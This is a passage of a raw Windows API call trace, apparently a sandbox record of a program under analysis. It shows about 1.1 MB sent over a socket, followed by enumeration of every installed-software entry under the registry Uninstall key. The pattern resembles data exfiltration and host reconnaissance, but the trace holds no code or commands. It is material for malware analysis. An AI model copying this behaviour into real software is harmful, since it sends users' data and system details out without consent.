pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x79509e0f, Data2=0xa801, Data3=0x4448, Data4=([0]=0x96, [1]=0x35, [2]=0xc7, [3]=0x3, [4]=0x7a, [5]=0x6e, [6]=0x89, [7]=0xf8))) returned 0x0 [0281.837] send (s=0x348, buf=0x323cf46*, len=65536, flags=0) returned 65536 [0281.839] send (s=0x348, buf=0x324cf46*, len=65536, flags=0) returned 65536 [0282.131] send (s=0x348, buf=0x325cf46*, len=65536, flags=0) returned 65536 [0282.222] send (s=0x348, buf=0x326cf46*, len=65536, flags=0) returned 65536 [0282.314] send (s=0x348, buf=0x327cf46*, len=65536, flags=0) returned 65536 [0282.409] send (s=0x348, buf=0x328cf46*, len=65536, flags=0) returned 65536 [0282.503] send (s=0x348, buf=0x329cf46*, len=65536, flags=0) returned 65536 [0282.596] send (s=0x348, buf=0x32acf46*, len=65536, flags=0) returned 65536 [0282.687] send (s=0x348, buf=0x32bcf46*, len=65536, flags=0) returned 65536 [0282.778] send (s=0x348, buf=0x32ccf46*, len=65536, flags=0) returned 65536 [0282.868] send (s=0x348, buf=0x32dcf46*, len=65536, flags=0) returned 65536 [0282.973] send (s=0x348, buf=0x32ecf46*, len=65536, flags=0) returned 65536 [0283.222] send (s=0x348, buf=0x32fcf46*, len=65536, flags=0) returned 65536 [0283.316] send (s=0x348, buf=0x330cf46*, len=65536, flags=0) returned 65536 [0283.412] send (s=0x348, buf=0x331cf46*, len=65536, flags=0) returned 65536 [0284.017] send (s=0x348, buf=0x332cf46*, len=65536, flags=0) returned 65536 [0284.182] send (s=0x348, buf=0x333cf46*, len=65536, flags=0) returned 65536 [0284.911] send (s=0x348, buf=0x334cf46*, len=32183, flags=0) returned 32183 [0285.953] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 128 [0286.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2ec) returned 0x0 [0286.235] RegQueryInfoKeyW (in: hKey=0x2ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19f2ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19f2e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19f2ec*=0x2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19f2e8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.235] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x0, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.235] CoTaskMemFree (pv=0x0) [0286.235] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x2, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x3, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x4, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x5, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x6, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x7, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.236] CoTaskMemFree (pv=0x0) [0286.236] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x8, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x9, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0xa, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0xb, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0xc, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0xd, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0xe, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.237] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0xf, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.237] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x10, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x11, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x12, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x13, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x14, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x15, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x16, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.238] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x17, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.238] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x18, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x19, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1a, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1b, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1c, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1d, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1e, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.239] CoTaskMemFree (pv=0x0) [0286.239] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x1f, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x20, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x21, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x22, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x23, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x24, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x25, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.240] CoTaskMemFree (pv=0x0) [0286.240] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x26, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.241] CoTaskMemFree (pv=0x0) [0286.241] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x27, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.241] CoTaskMemFree (pv=0x0) [0286.241] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x28, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.241] CoTaskMemFree (pv=0x0) [0286.241] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x29, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.241] CoTaskMemFree (pv=0x0) [0286.241] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x2a, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.241] CoTaskMemFree (pv=0x0) [0286.241] RegEnumKeyExW (in: hKey=0x2ec, dwIndex=0x2b, lpName=0x21c76e4, lpcchName=0x19f308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x19f308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0286.241] CoTaskMemFree (pv=0x0) [0286.241] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.242] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.242] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.242] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.242] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.242] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.242] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.242] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.243] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.243] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.243] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.243] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.243] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="DXM_Runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.243] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.243] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.243] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.243] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.243] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.243] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.244] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.244] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.244] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.244] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.244] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.244] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.244] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.245] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.245] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.245] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.245] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.245] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.245] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.245] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.245] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.245] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.245] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.245] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.245] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, 